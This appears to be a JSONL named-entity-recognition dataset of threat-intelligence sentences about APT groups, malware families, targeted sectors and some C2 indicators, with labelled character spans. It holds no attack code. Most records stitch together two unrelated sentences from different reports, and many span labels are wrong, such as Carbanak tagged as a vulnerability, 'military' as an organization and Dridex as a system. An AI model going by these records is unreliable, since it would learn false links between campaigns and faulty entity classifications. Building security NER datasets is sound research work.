{"text": "The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party .", "spans": [{"start": 80, "end": 87, "label": "Malware"}, {"start": 90, "end": 127, "label": "Malware"}, {"start": 237, "end": 246, "label": "Organization"}, {"start": 270, "end": 289, "label": "Organization"}, {"start": 292, "end": 309, "label": "Organization"}, {"start": 324, "end": 332, "label": "Organization"}, {"start": 365, "end": 386, "label": "Organization"}]}
{"text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 41, "end": 58, "label": "Malware"}]}
{"text": "MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . FrozenCell is the mobile component of a multi-platform attack we've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 \" , use to spy on victims through compromised mobile devices and desktops .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 70, "end": 92, "label": "Malware"}, {"start": 97, "end": 122, "label": "Malware"}, {"start": 162, "end": 172, "label": "Malware"}, {"start": 272, "end": 289, "label": "Organization"}]}
{"text": "Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector .", "spans": [{"start": 26, "end": 47, "label": "Malware"}, {"start": 58, "end": 73, "label": "System"}, {"start": 79, "end": 95, "label": "Malware"}, {"start": 178, "end": 191, "label": "Malware"}]}
{"text": "Research presented in this report shows that the PUTTER PANDA operators are likely members of the 12th Bureau , 3rd General Staff Department ( GSD ) of the People 's Liberation Army ( PLA ) , operating from the unit 's headquarters in Shanghai with MUCD 61486 . Desert Falcons is keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying .", "spans": [{"start": 49, "end": 61, "label": "Organization"}, {"start": 62, "end": 71, "label": "Organization"}, {"start": 156, "end": 181, "label": "Organization"}, {"start": 184, "end": 187, "label": "Organization"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 262, "end": 276, "label": "Organization"}, {"start": 421, "end": 428, "label": "System"}]}
{"text": "That this group is mostly targeting businesses is apparent from the processes they are looking for on a compromised system . FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 36, "end": 46, "label": "Organization"}, {"start": 125, "end": 147, "label": "Malware"}, {"start": 190, "end": 198, "label": "Organization"}, {"start": 201, "end": 209, "label": "Organization"}, {"start": 212, "end": 221, "label": "Organization"}, {"start": 224, "end": 228, "label": "Organization"}, {"start": 235, "end": 243, "label": "Organization"}]}
{"text": "They are both targeting businesses using accounting software , are fingerprinting systems of interest similarly , are looking for smart card readers , and finally , they deploy an array of malicious tools to spy on their victims . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": [{"start": 24, "end": 34, "label": "Organization"}, {"start": 263, "end": 273, "label": "Malware"}, {"start": 300, "end": 312, "label": "Malware"}, {"start": 346, "end": 354, "label": "Organization"}]}
{"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , industrial control systems and SCADA , government , and media for espionage and destructive purposes , since at least 2011 . It appears the Desert Falcons sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) .", "spans": [{"start": 117, "end": 129, "label": "System"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 213, "end": 223, "label": "Organization"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 314, "end": 328, "label": "Organization"}, {"start": 566, "end": 603, "label": "Organization"}]}
{"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , government , and media for espionage and destructive purposes , since at least 2011 . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": [{"start": 117, "end": 129, "label": "System"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 201, "end": 210, "label": "Organization"}, {"start": 365, "end": 384, "label": "Organization"}, {"start": 393, "end": 414, "label": "Organization"}]}
{"text": "If you haven't heard about it for some reason , I would recommend to read this detailed report by Group-IB , as this APT attacks not only Russian banks , but also banks in more than 25 countries . We believe that this is a new variant of VAMP , indicating that the threat actors behind APT-C-23 are still active and continuously improving their product .", "spans": [{"start": 98, "end": 106, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 238, "end": 242, "label": "Malware"}, {"start": 286, "end": 294, "label": "Organization"}]}
{"text": "The credentials they use to register their malware infrastructure are easily associated with their public social media accounts on Google\u00ae , Facebook\u00ae , MySpace\u00ae , Instagram\u00ae , and various dating and blogging sites . VAMP targeted various types of data from the phones of victims : images , text messages , contacts , and call history , among others .", "spans": [{"start": 106, "end": 118, "label": "Organization"}, {"start": 131, "end": 138, "label": "Organization"}, {"start": 141, "end": 150, "label": "Organization"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 164, "end": 174, "label": "Organization"}, {"start": 189, "end": 214, "label": "Organization"}, {"start": 217, "end": 221, "label": "Malware"}]}
{"text": "We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . Recently , Trend Micro researchers came across a new mobile malware family which we have called GnatSpy .", "spans": [{"start": 28, "end": 34, "label": "Organization"}, {"start": 83, "end": 93, "label": "Organization"}, {"start": 107, "end": 115, "label": "Organization"}, {"start": 227, "end": 238, "label": "Organization"}, {"start": 312, "end": 319, "label": "Malware"}]}
{"text": "North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . On Nov. 27 , 2018 , Cisco 's Talos research division published a write-up outlining the contours of a sophisticated cyber espionage campaign it dubbed DNSpionage .", "spans": [{"start": 137, "end": 146, "label": "Organization"}, {"start": 158, "end": 165, "label": "Organization"}, {"start": 198, "end": 212, "label": "Organization"}]}
{"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker . Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers .", "spans": [{"start": 0, "end": 20, "label": "Organization"}, {"start": 64, "end": 70, "label": "Organization"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 134, "end": 139, "label": "System"}, {"start": 185, "end": 195, "label": "Organization"}, {"start": 281, "end": 284, "label": "Indicator"}, {"start": 335, "end": 361, "label": "System"}, {"start": 364, "end": 367, "label": "System"}]}
{"text": "Furthermore , there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations . Talos reported that these DNS hijacks also paved the ACT for the attackers to obtain SSL encryption certificates for the targeted domains ( webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text .", "spans": [{"start": 41, "end": 46, "label": "Organization"}, {"start": 87, "end": 95, "label": "Organization"}, {"start": 100, "end": 110, "label": "Organization"}, {"start": 141, "end": 146, "label": "Organization"}, {"start": 281, "end": 303, "label": "Indicator"}, {"start": 354, "end": 359, "label": "System"}, {"start": 364, "end": 367, "label": "System"}]}
{"text": "The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in , or preparing to invest in , the country . That changed on Jan. 25 , 2019 , when security firm CrowdStrike published a blog post listing virtually every Internet address known to be ( ab )used by the espionage campaign to date .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 66, "end": 73, "label": "Organization"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 229, "end": 242, "label": "Organization"}, {"start": 243, "end": 254, "label": "Organization"}]}
{"text": "While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement , intellectual property theft , or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations . Working backwards from each Internet address , I was able to see that in the last few months of 2018 the hackers behind DNSpionage succeeded in compromising key components of DNS infrastructure for more than 50 Middle Eastern companies and government agencies , including targets in Albania , Cyprus , Egypt , Iraq , Jordan , Kuwait , Lebanon , Libya , Saudi Arabia and the United Arab Emirates .", "spans": [{"start": 30, "end": 35, "label": "Organization"}, {"start": 157, "end": 172, "label": "Organization"}, {"start": 489, "end": 492, "label": "Indicator"}, {"start": 540, "end": 549, "label": "Organization"}, {"start": 554, "end": 573, "label": "Organization"}]}
{"text": "The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions , ATM compromise , and other monetization schemes . PCH is a nonprofit entity based in northern California that also manages significant amounts of the world 's DNS infrastructure , particularly the DNS for more than 500 top-level domains and a number of the Middle East top-level domains targeted by DNSpionage .", "spans": [{"start": 15, "end": 31, "label": "System"}, {"start": 35, "end": 39, "label": "Organization"}, {"start": 179, "end": 199, "label": "Organization"}, {"start": 361, "end": 364, "label": "Indicator"}, {"start": 399, "end": 402, "label": "Indicator"}]}
{"text": "For our M-Trends 2017 report , we took a look at the incidents we investigated last year and provided a global and regional (the Americas , APAC and EMEA) analysis focused on attack trends , and defensive and emerging trends . This APT group usually carries out target attacks against government agencies to steal sensitive information .", "spans": [{"start": 8, "end": 16, "label": "Organization"}, {"start": 195, "end": 204, "label": "Organization"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 285, "end": 304, "label": "Organization"}]}
{"text": "In April 2015 , we uncovered the malicious efforts of APT30 , a suspected China-based threat group that has exploited the networks of governments and organizations across the region , targeting highly sensitive political , economic and military information . In addition to spreading malware via spear fishing email with Office attachment containing either vulnerability or malicious macro , this group is particularly good at leveraging malicious Android APKs in the target attacks .", "spans": [{"start": 54, "end": 59, "label": "Organization"}, {"start": 134, "end": 145, "label": "Organization"}, {"start": 150, "end": 163, "label": "Organization"}, {"start": 201, "end": 220, "label": "Organization"}, {"start": 223, "end": 231, "label": "Organization"}, {"start": 236, "end": 244, "label": "Organization"}, {"start": 448, "end": 460, "label": "Malware"}]}
{"text": "Yet the document cache published April 8 provides evidence that the NSA had once launched a series of successful computer-based intrusions against multiple high-profile foreign targets , including the Office of the President of Iran and the Russian Federal Nuclear Center . We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware .", "spans": [{"start": 68, "end": 71, "label": "Organization"}, {"start": 293, "end": 302, "label": "Organization"}, {"start": 411, "end": 418, "label": "System"}, {"start": 423, "end": 430, "label": "Malware"}, {"start": 431, "end": 438, "label": "Malware"}]}
{"text": "Emotet activity in 2019 included several high-volume campaigns that collectively distributed tens of millions of messages primarily targeting the manufacturing and healthcare industries . In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities .", "spans": [{"start": 146, "end": 159, "label": "Organization"}, {"start": 164, "end": 185, "label": "Organization"}, {"start": 238, "end": 245, "label": "System"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 281, "end": 300, "label": "Organization"}]}
{"text": "Originally targeting Western European banks , Emotet has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . We also started monitoring the malware and , using Kaspersky Attribution Engine based on similarity algorithms , discovered that Octopus is related to DustSquad , something we reported in April 2018 .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 46, "end": 52, "label": "System"}, {"start": 166, "end": 172, "label": "System"}, {"start": 199, "end": 212, "label": "Malware"}, {"start": 215, "end": 235, "label": "Malware"}, {"start": 238, "end": 248, "label": "Malware"}, {"start": 251, "end": 262, "label": "Malware"}, {"start": 269, "end": 273, "label": "Malware"}, {"start": 342, "end": 351, "label": "Organization"}, {"start": 420, "end": 427, "label": "Malware"}]}
{"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194.126.10.18 , which appropriately enough is an Internet address based in Lebanon .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 162, "end": 168, "label": "System"}, {"start": 195, "end": 208, "label": "Malware"}, {"start": 211, "end": 231, "label": "Malware"}, {"start": 234, "end": 244, "label": "Malware"}, {"start": 247, "end": 258, "label": "Malware"}, {"start": 265, "end": 269, "label": "Malware"}]}
{"text": "Transparent Tribe has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets . Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen .", "spans": [{"start": 132, "end": 141, "label": "Organization"}, {"start": 146, "end": 154, "label": "Organization"}, {"start": 165, "end": 178, "label": "Organization"}, {"start": 199, "end": 213, "label": "Malware"}]}
{"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": [{"start": 124, "end": 135, "label": "Organization"}, {"start": 207, "end": 225, "label": "Organization"}, {"start": 309, "end": 320, "label": "Organization"}, {"start": 323, "end": 329, "label": "Organization"}, {"start": 337, "end": 344, "label": "Malware"}, {"start": 345, "end": 352, "label": "Malware"}, {"start": 393, "end": 400, "label": "Malware"}, {"start": 401, "end": 408, "label": "Malware"}]}
{"text": "To date , Whitefly has attacked organizations in the healthcare , media , telecommunications , and engineering sectors . El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 53, "end": 63, "label": "Organization"}, {"start": 66, "end": 71, "label": "Organization"}, {"start": 74, "end": 92, "label": "Organization"}, {"start": 99, "end": 118, "label": "Organization"}, {"start": 203, "end": 212, "label": "Organization"}]}
{"text": "Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . We've found that this group has continued to operate successfully , predominantly in Latin America , since 2014 .", "spans": [{"start": 88, "end": 96, "label": "Organization"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 155, "end": 161, "label": "Organization"}]}
{"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 126, "end": 139, "label": "Organization"}, {"start": 289, "end": 291, "label": "System"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . In the case of Octopus , DustSquad used Delphi as their programming language of choice , which is unusual for such an actor .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 214, "end": 221, "label": "Malware"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 266, "end": 287, "label": "Organization"}, {"start": 290, "end": 298, "label": "Organization"}, {"start": 301, "end": 318, "label": "Organization"}, {"start": 321, "end": 339, "label": "Organization"}, {"start": 344, "end": 349, "label": "Organization"}, {"start": 354, "end": 363, "label": "Organization"}, {"start": 370, "end": 393, "label": "Organization"}]}
{"text": "APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . Some time ago , a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown , undetected malware .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 19, "end": 35, "label": "Organization"}, {"start": 142, "end": 155, "label": "Organization"}]}
{"text": "The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . It was a targeted attack we are calling \" Machete \" .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 92, "end": 100, "label": "Organization"}, {"start": 101, "end": 114, "label": "Organization"}]}
{"text": "They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 46, "end": 54, "label": "Organization"}, {"start": 199, "end": 223, "label": "Malware"}, {"start": 311, "end": 320, "label": "Indicator"}]}
{"text": "Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . \" Machete \" is a targeted attack campaign with Spanish speaking roots .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 50, "end": 57, "label": "Organization"}, {"start": 77, "end": 90, "label": "Organization"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The decoy slideshows all contain photos from very meaningful events to individuals in Thailand , suggesting that the actors continually look for impactful events to use to disguise their attacks .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 203, "end": 219, "label": "Malware"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . In some cases , such as Russia , the target appears to be an embassy from one of the countries of this list .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 260, "end": 267, "label": "Organization"}]}
{"text": "We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare . Both attackers and victims speak Spanish natively , as we see it consistently in the source code of the client side and in the Python code .", "spans": [{"start": 172, "end": 182, "label": "Organization"}, {"start": 312, "end": 318, "label": "System"}]}
{"text": "Orangeworm 's secondary targets include Manufacturing , Information Technology , Agriculture , and Logistics . We are also grateful to the Private Office of his Holiness the Dalai Lama , the Tibetan Government-in-Exile , the missions of Tibet in London , Brussels , and New York , and Drewla ( a Tibetan NGO ) .", "spans": [{"start": 40, "end": 53, "label": "Organization"}, {"start": 56, "end": 78, "label": "Organization"}, {"start": 81, "end": 92, "label": "Organization"}, {"start": 99, "end": 108, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 255, "end": 263, "label": "Organization"}, {"start": 285, "end": 291, "label": "Organization"}, {"start": 296, "end": 303, "label": "Organization"}, {"start": 304, "end": 307, "label": "Organization"}]}
{"text": "While these industries may appear to be unrelated , we found them to have multiple links to healthcare , such as large manufacturers that produce medical imaging devices sold directly into healthcare firms , IT organizations that provide support services to medical clinics , and logistical organizations that deliver healthcare products . Between June 2008 and March 2009 the Information Warfare Monitor conducted an extensive and exhaustive two-phase investigation focused on allegations of Chinese cyber espionage against the Tibetan community .", "spans": [{"start": 92, "end": 102, "label": "Organization"}, {"start": 189, "end": 205, "label": "Organization"}, {"start": 208, "end": 224, "label": "Organization"}, {"start": 258, "end": 273, "label": "Organization"}, {"start": 280, "end": 304, "label": "Organization"}, {"start": 318, "end": 328, "label": "Organization"}, {"start": 377, "end": 404, "label": "System"}, {"start": 529, "end": 546, "label": "Organization"}]}
{"text": "Patchwork targets were chosen worldwide with a focus on personnel working on military and political assignments , and specifically those working on issues relating to Southeast Asia and the South China Sea . These instances of Gh0st RAT are consistently controlled from commercial Internet access accounts located on the island of Hainan , People's Republic of China .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 56, "end": 65, "label": "Organization"}, {"start": 77, "end": 85, "label": "Organization"}, {"start": 90, "end": 99, "label": "Organization"}, {"start": 227, "end": 236, "label": "Malware"}, {"start": 340, "end": 357, "label": "Organization"}]}
{"text": "Patchwork ( also known as Dropping Elephant ) is a cyberespionage group whose targets included diplomatic and government agencies as well as businesses . The fieldwork generated extensive data that allowed us to examine Tibetan information security practices , as well as capture real-time evidence of malware that had penetrated Tibetan computer systems .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 26, "end": 43, "label": "Organization"}, {"start": 51, "end": 71, "label": "Organization"}, {"start": 95, "end": 105, "label": "Organization"}, {"start": 110, "end": 129, "label": "Organization"}, {"start": 141, "end": 151, "label": "Organization"}, {"start": 220, "end": 258, "label": "Organization"}, {"start": 330, "end": 337, "label": "Organization"}]}
{"text": "Dropping Elephant ( also known as \" Chinastrats \" and \" Patchwork \" ) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools . It is therefore possible that the large percentage of high value targets identified in our analysis of the GhostNet are coincidental , spread by contact between individuals who previously communicated through e-mail .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 36, "end": 47, "label": "Organization"}, {"start": 56, "end": 65, "label": "Organization"}, {"start": 90, "end": 102, "label": "Organization"}, {"start": 147, "end": 157, "label": "Organization"}, {"start": 162, "end": 170, "label": "Organization"}, {"start": 425, "end": 431, "label": "System"}]}
{"text": "In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . Where they exist , they often use grey market or pirated software .", "spans": [{"start": 23, "end": 28, "label": "Organization"}, {"start": 57, "end": 81, "label": "System"}, {"start": 93, "end": 111, "label": "Organization"}, {"start": 242, "end": 253, "label": "Malware"}, {"start": 257, "end": 273, "label": "Malware"}]}
{"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 126, "end": 139, "label": "Organization"}, {"start": 277, "end": 283, "label": "System"}, {"start": 327, "end": 336, "label": "Indicator"}, {"start": 358, "end": 365, "label": "Vulnerability"}, {"start": 375, "end": 381, "label": "Malware"}]}
{"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets . GhostNet represents a network of compromised computers resident in high-value political , economic , and media locations spread across numerous countries worldwide .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 21, "end": 39, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 275, "end": 283, "label": "Organization"}, {"start": 290, "end": 295, "label": "Organization"}]}
{"text": "The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions \u2014 often including military installations , intelligence agencies , and other government bodies . After that , the attacker is capable to control the compromised device .", "spans": [{"start": 107, "end": 113, "label": "Organization"}, {"start": 127, "end": 136, "label": "Organization"}, {"start": 141, "end": 149, "label": "Organization"}, {"start": 247, "end": 267, "label": "Organization"}, {"start": 272, "end": 284, "label": "Organization"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 328, "end": 349, "label": "Organization"}, {"start": 362, "end": 372, "label": "Organization"}]}
{"text": "This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries . The computers of diplomats , military attach\u00e9s , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant .", "spans": [{"start": 166, "end": 175, "label": "Organization"}, {"start": 180, "end": 204, "label": "Organization"}, {"start": 224, "end": 233, "label": "Organization"}, {"start": 236, "end": 253, "label": "Organization"}, {"start": 256, "end": 274, "label": "Organization"}, {"start": 277, "end": 288, "label": "Organization"}, {"start": 292, "end": 307, "label": "Organization"}, {"start": 310, "end": 321, "label": "Organization"}]}
{"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . The C&C server ( 82.137.255.56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 39, "end": 44, "label": "Organization"}, {"start": 106, "end": 116, "label": "Organization"}, {"start": 119, "end": 126, "label": "Organization"}, {"start": 129, "end": 137, "label": "Organization"}, {"start": 144, "end": 162, "label": "Organization"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 255, "end": 275, "label": "Organization"}, {"start": 282, "end": 285, "label": "System"}, {"start": 295, "end": 308, "label": "Indicator"}, {"start": 351, "end": 359, "label": "Organization"}, {"start": 362, "end": 371, "label": "Organization"}]}
{"text": "In 2015 and 2016 , Dridex was one of the most prolific eCrime banking trojans on the market and , since 2014 , those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits . According to 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor .", "spans": [{"start": 19, "end": 25, "label": "System"}, {"start": 62, "end": 69, "label": "Organization"}, {"start": 152, "end": 165, "label": "Organization"}, {"start": 221, "end": 251, "label": "Organization"}, {"start": 300, "end": 314, "label": "Malware"}]}
{"text": "In August 2017 , a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K. 's National Health Service ( NHS ) , with a high ransom demand of 53 BTC ( approximately $200,000 USD ) . The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": [{"start": 56, "end": 65, "label": "System"}, {"start": 108, "end": 131, "label": "Organization"}, {"start": 134, "end": 137, "label": "Organization"}, {"start": 231, "end": 237, "label": "Malware"}, {"start": 283, "end": 289, "label": "Malware"}, {"start": 363, "end": 380, "label": "Organization"}]}
{"text": "Known for hijacking prominent social media accounts , the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network . The APT group is reportedly targeting the Middle East region .", "spans": [{"start": 30, "end": 42, "label": "Organization"}, {"start": 133, "end": 140, "label": "Organization"}, {"start": 145, "end": 153, "label": "Organization"}]}
{"text": "Through research , 360 Helios Team has found that , since 2007 , the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments , such as national defense , government , science and technology , education and maritime agencies . The malware has started targeting corporate , SMB , investment banking and consumer accounts at banks , including some in Portugal and the U.S. , in addition to Poland , according to researchers at IBM 's X-Force team .", "spans": [{"start": 19, "end": 34, "label": "Organization"}, {"start": 69, "end": 85, "label": "Organization"}, {"start": 192, "end": 208, "label": "Organization"}, {"start": 211, "end": 221, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}, {"start": 236, "end": 246, "label": "Organization"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 263, "end": 280, "label": "Organization"}, {"start": 329, "end": 332, "label": "Malware"}, {"start": 335, "end": 353, "label": "Organization"}, {"start": 379, "end": 384, "label": "Organization"}, {"start": 481, "end": 495, "label": "Organization"}]}
{"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries . According to Kessem the malware has redirection instructions for 17 banks , and features an additional 230 URLs to assist attackers in targeting community banks and email service providers in Poland .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 25, "end": 33, "label": "Organization"}, {"start": 61, "end": 67, "label": "Organization"}, {"start": 186, "end": 189, "label": "Organization"}, {"start": 194, "end": 208, "label": "Organization"}, {"start": 224, "end": 230, "label": "Organization"}, {"start": 279, "end": 284, "label": "Organization"}, {"start": 356, "end": 371, "label": "Organization"}, {"start": 376, "end": 399, "label": "Organization"}]}
{"text": "Known targets of this group have been involved in the maritime industry , as well as engineering-focused entities , and include research institutes , academic organizations , and private firms in the United States . With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 54, "end": 62, "label": "Organization"}, {"start": 128, "end": 147, "label": "Organization"}, {"start": 150, "end": 172, "label": "Organization"}, {"start": 179, "end": 192, "label": "Organization"}, {"start": 221, "end": 227, "label": "Malware"}, {"start": 278, "end": 282, "label": "Organization"}, {"start": 286, "end": 289, "label": "Malware"}, {"start": 294, "end": 309, "label": "Malware"}]}
